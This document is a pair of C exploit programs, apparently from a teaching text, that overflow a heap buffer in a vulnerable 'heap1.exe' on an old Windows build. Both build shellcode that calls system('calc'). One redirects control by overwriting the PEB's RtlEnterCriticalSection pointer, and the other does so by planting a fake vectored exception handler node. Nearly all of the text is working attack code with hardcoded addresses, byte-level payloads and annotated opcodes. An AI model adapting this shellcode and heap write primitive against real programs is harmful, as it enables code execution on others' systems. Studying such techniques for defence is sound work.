Example #1
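     /*
      * Appends the C string src to the C string already held in dst without
      * writing past cap bytes (terminator included).  Returns 0 on success and
      * -1 if the result would not fit, in which case dst is left untouched.
      * Replaces the bare strcat() calls of the original so that a payload that
      * outgrows the fixed command buffer fails loudly instead of overflowing
      * the stack of the exploit program itself.
      */
     static int append_arg(char *dst, size_t cap, const char *src)
     {
            size_t used = strlen(dst);
            size_t add = strlen(src);

            if (used >= cap || add >= cap - used)
                    return -1;
            memcpy(dst + used, src, add + 1);
            return 0;
     }

     /*
      * Encodes addr with fixupaddresses() (defined elsewhere in this file) and
      * appends the encoded bytes to dst.  The bytes travel inside a C string,
      * so a 0x00 byte anywhere in the address would silently truncate the
      * payload; that case is reported as a failure instead of being sent.
      * Returns 0 on success, -1 on a NUL byte or when dst is full.
      * NOTE(review): assumes fixupaddresses() stores the four raw little-endian
      * address bytes followed by a terminator in tmp - confirm against its
      * definition.
      */
     static int append_address(char *dst, size_t cap, unsigned int addr)
     {
            char tmp[8] = "";   /* zero-filled so strlen() below is bounded */

            fixupaddresses(tmp, addr);
            if (strlen(tmp) != sizeof addr)
                    return -1;
            return append_arg(dst, cap, tmp);
     }

     /*
      * Builds the overflowing command line for the vulnerable heap1.exe and
      * launches it via system().  The payload is shellcode that restores the
      * PEB lock routine pointer it is about to clobber and then calls
      * msvcrt!system("calc"), followed by padding and the two pointers that
      * the heap-overflow write primitive uses.
      *
      * The fixed pointers below (PEB at 0x7FFDF000, heap buffer at 0x00350688)
      * are specific to the historical Windows build this listing targets and
      * presumably need adjusting on any other system - confirm before use.
      * Returns 0 after launching the target, EXIT_FAILURE if an address could
      * not be resolved or the payload could not be assembled.
      */
     int main()
     {
            char buffer[300] = "";
            unsigned int address_of_system = 0;
            unsigned int address_of_RtlEnterCriticalSection = 0;
            unsigned int cnt = 0;
            int rc = 0;   /* sticky: stays -1 once any append fails */

            printf("Getting addresses...\n");
            address_of_system = GetAddress("msvcrt.dll","system");
            address_of_RtlEnterCriticalSection = GetAddress("ntdll.dll","RtlEnterCriticalSection");
            if (address_of_system == 0 || address_of_RtlEnterCriticalSection == 0) {
                    printf("Failed to get addresses\n");
                    return EXIT_FAILURE;   /* original returned printf()'s byte count */
            }
            printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
            printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection);

            /* Target program name; the overflow string follows as one quoted argument. */
            rc |= append_arg(buffer, sizeof buffer, "heap1 ");

            /*
             * Shellcode - repairs the PEB then calls system("calc"):
             *   90 90 90 90 01 90 90   nop sled (bytes reproduced as listed)
             *   6A 30 / 59             push 0x30 ; pop ecx
             *   64 8B 01               mov eax, fs:[ecx]   -> eax = PEB
             *   B9 <addr>              mov ecx, &RtlEnterCriticalSection
             *   89 48 20               mov [eax+0x20], ecx -> restore PEB lock routine
             *   33 C0 / 50             xor eax,eax ; push eax   (terminator)
             *   68 "calc" / 54 / 5B    push "calc" ; push esp ; pop ebx
             *   50 / 53                push eax ; push ebx     (arg for system)
             *   B9 <addr> / FF D1      mov ecx, &system ; call ecx
             */
            rc |= append_arg(buffer, sizeof buffer, "\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9");
            rc |= append_address(buffer, sizeof buffer, address_of_RtlEnterCriticalSection);
            rc |= append_arg(buffer, sizeof buffer, "\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
            rc |= append_address(buffer, sizeof buffer, address_of_system);
            rc |= append_arg(buffer, sizeof buffer, "\xFF\xD1");

            /* Padding: 58 * 4 = 232 bytes of 'D' up to the overwritten heap header. */
            for (cnt = 0; cnt < 58; cnt++)
                    rc |= append_arg(buffer, sizeof buffer, "DDDD");

            /* Pointer to RtlEnterCriticalSection pointer - 4 in PEB (0x7FFDF01C). */
            rc |= append_arg(buffer, sizeof buffer, "\x1C\xF0\xFD\x7f");

            /*
             * Pointer to heap and thus shellcode (0x00350688).  Only three bytes
             * are sent: the high 0x00 byte cannot be placed in a C string, so it
             * is expected to come from the argument's own terminator once the
             * target's command-line parsing strips the closing quote - confirm.
             */
            rc |= append_arg(buffer, sizeof buffer, "\x88\x06\x35");

            rc |= append_arg(buffer, sizeof buffer, "\"");

            if (rc != 0) {
                    printf("Payload does not fit in the command buffer or an address contains a NUL byte\n");
                    return EXIT_FAILURE;
            }

            printf("\nExecuting heap1.exe... calc should open.\n");
            system(buffer);
            return 0;
     }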
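     /*
      * Appends the C string src to the C string already held in dst without
      * writing past cap bytes (terminator included).  Returns 0 on success and
      * -1 if the result would not fit, in which case dst is left untouched.
      * Used in place of unchecked strcat() so that an oversized payload is
      * rejected rather than overflowing the exploit program's own buffer.
      */
     static int payload_append(char *dst, size_t cap, const char *src)
     {
            size_t used = strlen(dst);
            size_t add = strlen(src);

            if (used >= cap || add >= cap - used)
                    return -1;
            memcpy(dst + used, src, add + 1);
            return 0;
     }

     /*
      * Encodes addr with fixupaddresses() (defined elsewhere in this file) and
      * appends the encoded bytes to dst.  Because the bytes are carried in a C
      * string, an address containing 0x00 would be silently cut short; that is
      * reported as a failure here.  Returns 0 on success, -1 otherwise.
      * NOTE(review): assumes fixupaddresses() writes the four raw little-endian
      * bytes plus a terminator into tmp - confirm against its definition.
      */
     static int payload_append_address(char *dst, size_t cap, unsigned int addr)
     {
            char tmp[8] = "";   /* zero-filled so strlen() below is bounded */

            fixupaddresses(tmp, addr);
            if (strlen(tmp) != sizeof addr)
                    return -1;
            return payload_append(dst, cap, tmp);
     }

     /*
      * Builds the overflowing command line for heap1.exe and launches it via
      * system().  This variant hijacks the vectored exception handler list:
      * the overflow writes a pointer to a fake _VECTORED_EXCEPTION_NODE that
      * in turn points at the shellcode, which calls msvcrt!system("calc").
      *
      * The fixed pointers below (0x77FC3210 for the VEH list head, 0x0012FF48
      * for the fake node) are specific to the historical Windows build this
      * listing targets and must be adjusted per system, as the original
      * comment already notes.  Returns 0 after launching the target,
      * EXIT_FAILURE if the address of system() could not be resolved or the
      * payload could not be assembled.
      */
     int main()
     {
            char buffer[300] = "";
            unsigned int address_of_system = 0;
            unsigned int cnt = 0;
            int rc = 0;   /* sticky: stays -1 once any append fails */

            printf("Getting address of system...\n");

            address_of_system = GetAddress("msvcrt.dll","system");
            if (address_of_system == 0) {
                    printf("Failed to get address.\n");
                    return EXIT_FAILURE;   /* original returned printf()'s byte count */
            }

            printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);

            /* Target program name; the overflow string follows as its argument. */
            rc |= payload_append(buffer, sizeof buffer, "heap1 ");

            /* NOP sled: 5 * 4 = 20 bytes, so an imprecise entry still lands. */
            for (cnt = 0; cnt < 5; cnt++)
                    rc |= payload_append(buffer, sizeof buffer, "\x90\x90\x90\x90");

            /*
             * Shellcode to call system("calc"):
             *   90                     nop
             *   33 C0 / 50             xor eax,eax ; push eax   (terminator)
             *   68 "calc" / 54 / 5B    push "calc" ; push esp ; pop ebx
             *   50 / 53                push eax ; push ebx     (arg for system)
             *   B9 <addr> / FF D1      mov ecx, &system ; call ecx
             */
            rc |= payload_append(buffer, sizeof buffer, "\x90\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
            rc |= payload_append_address(buffer, sizeof buffer, address_of_system);
            rc |= payload_append(buffer, sizeof buffer, "\xFF\xD1");

            /* Padding: 58 * 4 = 232 bytes of 'D' up to the overwritten heap header. */
            for (cnt = 0; cnt < 58; cnt++)
                    rc |= payload_append(buffer, sizeof buffer, "DDDD");

            /*
             * Pointer to 0x77FC3210 - 4 (i.e. 0x77FC320C).  0x77FC3210 holds the
             * pointer to the first _VECTORED_EXCEPTION_NODE structure.
             */
            rc |= payload_append(buffer, sizeof buffer, "\x0C\x32\xFC\x77");

            /*
             * Pointer to our pseudo _VECTORED_EXCEPTION_NODE structure at
             * address 0x0012FF48.  This address + 8 contains a pointer to our
             * allocated buffer, which is what gets called when vectored
             * exception handling kicks in.  Modify this according to where it
             * can be found on your system.  The trailing \x00 in the literal is
             * never copied (C-string semantics); the argument's terminator is
             * expected to supply that byte on the target side - confirm.
             */
            rc |= payload_append(buffer, sizeof buffer, "\x48\xff\x12\x00");

            if (rc != 0) {
                    printf("Payload does not fit in the command buffer or an address contains a NUL byte\n");
                    return EXIT_FAILURE;
            }

            printf("\nExecuting heap1.exe... calc should open.\n");
            system(buffer);
            return 0;
     }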